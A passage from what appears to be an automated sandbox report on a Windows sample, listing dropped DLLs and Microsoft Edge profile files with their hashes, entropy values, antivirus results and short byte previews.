                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):46034
                                                                                                                                                                                                                                                        Entropy (8bit):6.087678931443275
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgBobzNiuChDO6vP6O6ar5JNewPJY3xIAB3lMCAocGoup1Xl3j5:mMk1rT8HhobzX6aarehTMRochu3VlXrT
                                                                                                                                                                                                                                                        MD5:01D3A2ADFEDBFF1BCA79C734C065B10D
                                                                                                                                                                                                                                                        SHA1:43D3CF75435C223CEF379C8E4B6894C97E0099CA
                                                                                                                                                                                                                                                        SHA-256:FE2B01FDBBBA9CC9E66647F8F8AD46BF3F2FA201792320FF70ADCD2A42256DC6
                                                                                                                                                                                                                                                        SHA-512:3B91F78B891926968923C6FAE78BA9B661E5BF7D1044CEC537C70863615480B8105CF7F404E5DECB96D897896432F3B3EFB2C3FCF58664F74F5196FB0C6E3ACF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):46034
                                                                                                                                                                                                                                                        Entropy (8bit):6.08767773130522
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgB9bzNiuChDO6vP6O6ar5JNewPJY3xIAB3lMCAocGoup1Xl3j5:mMk1rT8Hh9bzX6aarehTMRochu3VlXrT
                                                                                                                                                                                                                                                        MD5:F317D0B77F73FA8A517E586761B37C51
                                                                                                                                                                                                                                                        SHA1:619CF584B09BC13F47850A9A510246980E9689A0
                                                                                                                                                                                                                                                        SHA-256:230A40037D320586EA1DAE7688B18F9DF06C6A00AD1BA06E35929F518D84A847
                                                                                                                                                                                                                                                        SHA-512:DA198D3B119EB4803B7B81D09380DBB86AF2F33C73F2D33A7FB34F11BB27BC73D00B9327ECA02247094EB5A1B37E45F72922D14E8DF752F0D799EF26C6ED11AE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                        Entropy (8bit):6.090739494434723
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMAwuF9hDO6vP6O+Ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEG6etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:823CC343BCB387C66444B294D8B91769
                                                                                                                                                                                                                                                        SHA1:79706212495F37F90FF98C21F22A2AD9A3F57FA2
                                                                                                                                                                                                                                                        SHA-256:16624A2E1AF4290D85FF7D022AEC0DBCB7DBD0BA61E2355FB29990D2156F2490
                                                                                                                                                                                                                                                        SHA-512:92C29CF93645A0CA3215433842AEC5BB5AD283C2E01249AFE553ACCC622E8EF849BBB04FAF0DCEEFC9A5DC147740F6C3A0F64FF21ECFC498A49843D48801678C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44604
                                                                                                                                                                                                                                                        Entropy (8bit):6.0965289034241
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBRwu5hDO6vP6O6ard2bWFipAFMzRcGoup1Xl3jVz6:z/Ps+wsI7ynEm6aar2Rchu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:02844D8059D000A63BA8B2F2DCBE2223
                                                                                                                                                                                                                                                        SHA1:A8B6FB9D7B814E72C089B9A89091935DD43647F2
                                                                                                                                                                                                                                                        SHA-256:AD4DB4D92135793497677A370E17D09A98D4E458359128225F33EDF1D544C3DF
                                                                                                                                                                                                                                                        SHA-512:D1BC9500FEB0541E5F78F18D534DD37D6BDF047A845DEDE27BFABD63CFB3D28CC8314ED1DF6EF14B02610EFADD15E5B9BDB686025ED78E0782398B05B9F06931
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):44604
                                                                                                                                                                                                                                                        Entropy (8bit):6.0965289034241
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBRwu5hDO6vP6O6ard2bWFipAFMzRcGoup1Xl3jVz6:z/Ps+wsI7ynEm6aar2Rchu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:02844D8059D000A63BA8B2F2DCBE2223
                                                                                                                                                                                                                                                        SHA1:A8B6FB9D7B814E72C089B9A89091935DD43647F2
                                                                                                                                                                                                                                                        SHA-256:AD4DB4D92135793497677A370E17D09A98D4E458359128225F33EDF1D544C3DF
                                                                                                                                                                                                                                                        SHA-512:D1BC9500FEB0541E5F78F18D534DD37D6BDF047A845DEDE27BFABD63CFB3D28CC8314ED1DF6EF14B02610EFADD15E5B9BDB686025ED78E0782398B05B9F06931
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44686
                                                                                                                                                                                                                                                        Entropy (8bit):6.095832150627181
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBAwu5hDO6vP6O6arFJNewPJYcGoup1Xl3jVzXr4CW:z/Ps+wsI7yOEF6aarqchu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:E62D110C4EC38A5226DA198CD9377585
                                                                                                                                                                                                                                                        SHA1:40DB17439DB9AD45F4D45E0920D5361679F0E39E
                                                                                                                                                                                                                                                        SHA-256:7A77A8BCE887E552B75F1DDD3ACB211D04F57E4813ABDC4E563567F689883347
                                                                                                                                                                                                                                                        SHA-512:54BE916DD3060416FE40E4B8898153F48455568D6CB2372646512A30DF596035EDAC9D6FD5995FE91376E97BC1A1ECB6A54475FBA75181780CECCD930F61B44D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                        Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                        MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                        SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                        SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                        SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                        Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                        MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                        SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                        SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                        SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                        Entropy (8bit):0.44473438013684446
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:WK4e7QRwVW4iSVs0ZTUfcAmaKUawR5B/VbWzqwIB7Gg1HF81:We7xHVs0RUfcPaBj/VbWzqwIB7GaHa1
                                                                                                                                                                                                                                                        MD5:D962E3EBC5A42E0DC64809FE1656ED3A
                                                                                                                                                                                                                                                        SHA1:C34468BED86D2A7D16FF3C3C039E43DD70D8AF15
                                                                                                                                                                                                                                                        SHA-256:4793FD196CFA2E03E20F85EADAA5CD8BB90AC1458D5D2C4DAB1266662D150BDC
                                                                                                                                                                                                                                                        SHA-512:0C3EEA6B16C1B6E1B38D3239EADFD369062A5190EE1D82EACC47584A3DA9DF7C2367F19E951F3084732B9B315C4C6076A79C47292FAD3B4DD6DDC265BFDED334
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@...............P..................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".flkfba20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2......
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                        Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
